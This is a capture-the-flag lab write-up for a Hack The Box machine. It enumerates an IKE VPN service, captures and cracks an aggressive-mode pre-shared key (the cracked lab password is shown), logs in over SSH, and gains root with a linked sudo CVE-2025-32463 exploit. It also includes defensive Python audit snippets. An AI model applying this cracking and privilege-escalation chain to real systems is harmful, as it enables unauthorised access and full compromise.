Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ nmap -sC -sV -Pn 10.129.242.213 -oN ./nmap.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Apart from TCP port 22, no other TCP ports are open, so we should also check for UDP services.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ sudo nmap -sS -sU -p U:1-1024 -T4 10.129.242.213
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 21:00 UTC
To be honest, using nmap to scan UDP services is not the first choice; here we can use udpx to help us do that:
https://github.com/nullt3r/udpx
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ udpx -t 10.129.242.213 -c 128 -w 1000
v1.0.7, by @nullt3r
2025/09/21 21:24:51 [+] Starting UDP scan on 1 target(s)
2025/09/21 21:24:51 [*] 10.129.13.112:500 (ike)
2025/09/21 21:25:52 [+] Scan completed
We can find something interesting here: an IKE service on UDP port 500.
IKE
- What is IKE?
Full name: Internet Key Exchange.
Purpose: used to establish and manage security associations (SAs) for IPsec VPNs.
Protocol: operates on UDP port 500 (UDP 4500 is sometimes used).
Functions:
Mutual authentication (can use pre-shared keys, certificates, Kerberos, etc.).
Negotiates encryption algorithms, hash algorithms, and Diffie-Hellman groups.
Generates session keys for subsequent data encryption.
To enumerate this service, we can use ike-scan:
$ sudo ike-scan expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112 Main Mode Handshake returned HDR=(CKY-R=1d432c635a2e8d64) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Then we can continue with aggressive mode, which leaks more information:
$ sudo ike-scan -A expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112 Aggressive Mode Handshake returned HDR=(CKY-R=10f501450cedfb8e) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
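The two handshake lines above contain everything a defender needs to judge the VPN endpoint. The following is an added example, not part of the original writeup or of ike-scan: it parses ike-scan result lines and flags aggressive mode with PSK authentication (which exposes the responder hash for offline guessing), weak ciphers, hashes and DH groups, and an identity disclosed in the ID payload. The sample lines are constructed from the two responses shown above.

```python
import re

# Added example, not from the writeup: audit ike-scan handshake lines for
# settings a defender would want changed. Sample lines are constructed from
# the Main/Aggressive mode responses quoted in the writeup.
IKE_SCAN_OUTPUT = """\
10.129.13.112\tMain Mode Handshake returned HDR=(CKY-R=1d432c635a2e8d64) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH)
10.129.13.112\tAggressive Mode Handshake returned HDR=(CKY-R=10f501450cedfb8e) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) Hash(20 bytes)
"""

LINE_RE = re.compile(r"^(\S+)\s+(Main|Aggressive) Mode Handshake returned .*?SA=\(([^)]*)\)(.*)$")
ID_RE = re.compile(r"ID\(Type=(\w+), Value=([^)]*)\)")

WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536

def parse_handshake(line):
    """Split one ike-scan result line into host, mode, SA attributes and ID."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    host, mode, sa, rest = m.groups()
    attrs = dict(kv.split("=", 1) for kv in sa.split())
    idm = ID_RE.search(rest)
    return {"host": host, "mode": mode, "sa": attrs, "id": idm.group(2) if idm else None}

def audit(line):
    """Return (mode, findings) for a handshake line, or None for non-result lines."""
    hs = parse_handshake(line)
    if hs is None:
        return None
    sa, findings = hs["sa"], []
    if hs["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        # Aggressive mode sends HASH_R in the clear, so the PSK is exposed to offline guessing.
        findings.append("aggressive-mode PSK: responder hash enables offline dictionary attack")
    if sa.get("Enc") in WEAK_ENC:
        findings.append("weak cipher " + sa["Enc"])
    if sa.get("Hash") in WEAK_HASH:
        findings.append("weak hash " + sa["Hash"])
    if sa.get("Group", "").split(":")[0] in WEAK_GROUPS:
        findings.append("weak DH group " + sa["Group"])
    if hs["id"]:
        findings.append("responder ID discloses identity " + hs["id"])
    return hs["mode"], findings

def audit_output(text):
    """Audit every line of ike-scan output; banners and blank lines are skipped."""
    return [r for r in (audit(l) for l in text.splitlines()) if r]
```

Running audit_output over real ike-scan output gives one (mode, findings) pair per responding host; the fix on the VPN side is to disable aggressive mode or move from PSK to certificate authentication, and to retire 3DES/SHA1/modp1024.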
Use -P to generate PSK cracking parameters
$ ike-scan -h
--pskcrack[=<f>] or -P[<f>] Crack aggressive mode pre-shared keys.
This option outputs the aggressive mode pre-shared key
(PSK) parameters for offline cracking using the
"psk-crack" program that is supplied with ike-scan.
You can optionally specify a filename, <f>, to write
the PSK parameters to. If you do not specify a filename
then the PSK parameters are written to standard output.
If you are using the short form of the option (-P)
then the value must immediately follow the option
letter with no spaces, e.g. -Pfile not -P file.
You can only specify a single target host if you use
this option.
This option is only applicable to IKE aggressive mode.
$ sudo ike-scan -A expressway.htb --id=ike@expressway.htb -Pike.psk
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112 Aggressive Mode Handshake returned HDR=(CKY-R=8408e5d22149f23f) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
$ tail ike.psk
bc859f8dc4a9e13eb9005f4c8837adcc1d9ae7a994f101f02a655305fa74f5b3749c13b308743811c37896b8ba1632058983ecd64a6da01ea8a780b45e31d486880c68028720cad28e5c341cf9cd9fc2a4d0cc05fd774937b43fb3186a0cd91dfab698c8643b1b693f20782a86db22aaa96a35bdf260fee61ae4488b04e96a2c:6c4ccc2b450929e68527c985be032635a885ce002b21ae9785424e55d3462b1d4898724e751ce9f111c994152f627699caba4e0d7b80b13a94841f1515fe6bd3fbe3ea13193abfde73c260a9d98bfdcaa1cf0c4763f27a23ac9e6368ec64cca68128f48b5fa62b91acdf44d088653841d3cc3d00707823c6e061d199bba30de7:8408e5d22149f23f:02df802fb6f5df66:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:9c4cb226f57fc96bcfee3b78bfe92ab2463b982e:aec8b6a180a4f3d9293c483b9705c9df35e01f24486b2b2f3e8774a6019e6bfd:9157243c333a25d603bf588a5c8a9c0bc966e3b0
Then we can use psk-crack to crack this secret:
$ psk-crack -d ~/wordlists/rockyou.txt ike.psk
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 9157243c333a25d603bf588a5c8a9c0bc966e3b0
Ending psk-crack: 8045039 iterations in 4.278 seconds (1880409.57 iterations/sec)
We can use the credential ike:freakingrockstarontheroad to SSH into the machine:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ ssh ike@expressway.htb
The authenticity of host 'expressway.htb (10.129.242.213)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password:
Last login: Wed Sep 17 12:19:40 BST 2025 from 10.10.14.64 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 12:37:37 2025 from 10.10.14.19
ike@expressway:~$
Privilege escalation
First, I would check id and sudo -l:
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
For security reasons, the password you type will not be visible.
Password:
Sorry, user ike may not run sudo on expressway.
We found that the ike account is in the proxy group, and this rejection message does not look like the default one, so I would check the sudo binary itself:
ike@expressway:~$ which sudo
/usr/local/bin/sudo
ike@expressway:~$ ls -lh /usr/local/bin/sudo
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo
Clearly the real default sudo has been replaced here: which resolves sudo to /usr/local/bin/sudo rather than /usr/bin/sudo.
ike@expressway:~$ file /usr/bin/sudo
/usr/bin/sudo: setuid ELF 64-bit LSB pie executable, ..., stripped
ike@expressway:~$ file /usr/local/bin/sudo
/usr/local/bin/sudo: setuid ELF 64-bit LSB pie executable, ..., with debug_info, not stripped
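A quick way to catch this pattern on a host you administer is to check whether the first match of a sensitive name on PATH is a setuid file that shadows a different file of the same name further down, as /usr/local/bin/sudo shadows /usr/bin/sudo here. The following is an added example, not a tool from the writeup; demo_fixture builds a constructed copy of the scenario under a temporary directory so it can run without touching the real system.

```python
import os
import stat
import tempfile

# Added example (not from the writeup): find a setuid binary that shadows a
# same-named program later on PATH, the pattern seen with /usr/local/bin/sudo
# sitting in front of /usr/bin/sudo.

def is_setuid(path):
    """True if the file exists and carries the setuid bit."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except OSError:
        return False

def shadowed_setuid(path_env, names=("sudo", "su", "passwd")):
    """Return (name, shadowing_path, shadowed_path) for every watched name whose
    first PATH match is setuid and a different file of that name exists later."""
    first, findings = {}, []
    for d in path_env.split(os.pathsep):
        for name in names:
            full = os.path.join(d, name)
            if not os.path.isfile(full):
                continue
            if name not in first:
                first[name] = full
            elif is_setuid(first[name]) and os.path.realpath(first[name]) != os.path.realpath(full):
                findings.append((name, first[name], full))
    return findings

def demo_fixture():
    """Constructed scenario: a setuid 'sudo' in a local/bin directory placed ahead
    of the system bin directory, both created under a temporary root."""
    root = tempfile.mkdtemp()
    local_bin = os.path.join(root, "usr", "local", "bin")
    usr_bin = os.path.join(root, "usr", "bin")
    for d in (local_bin, usr_bin):
        os.makedirs(d)
        with open(os.path.join(d, "sudo"), "w") as f:
            f.write("#!/bin/sh\n")  # placeholder content, never executed
    os.chmod(os.path.join(local_bin, "sudo"), 0o4755)  # setuid, like the finding above
    os.chmod(os.path.join(usr_bin, "sudo"), 0o4755)    # the legitimate sudo is setuid too
    return shadowed_setuid(os.pathsep.join([local_bin, usr_bin]))

if __name__ == "__main__":
    for name, shadowing, shadowed in shadowed_setuid(os.environ.get("PATH", "")):
        print(f"[!] {name}: {shadowing} (setuid) shadows {shadowed}")
```

On a real host, pair a hit with a package-ownership check (dpkg -S on Debian) and the file's build details, since the shadowing binary here was unstripped with debug info, unlike the packaged one.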
Now that we have found the original path, we can check the sudo version:
ike@expressway:~$ /usr/bin/sudo -V
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3
At this point we recall the well-known recent CVE-2025-32463:
Sudo chroot 1.9.17 - Local Privilege Escalation
The sudo version on this machine is vulnerable:
https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/blob/main/sudo-chwoot.sh
So we can just run the script and get a root shell:
ike@expressway:~$ bash sudo-chwoot.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Description
Overall it's a pretty boring machine that uses a lot of CTF techniques and is a bit too hard-coded.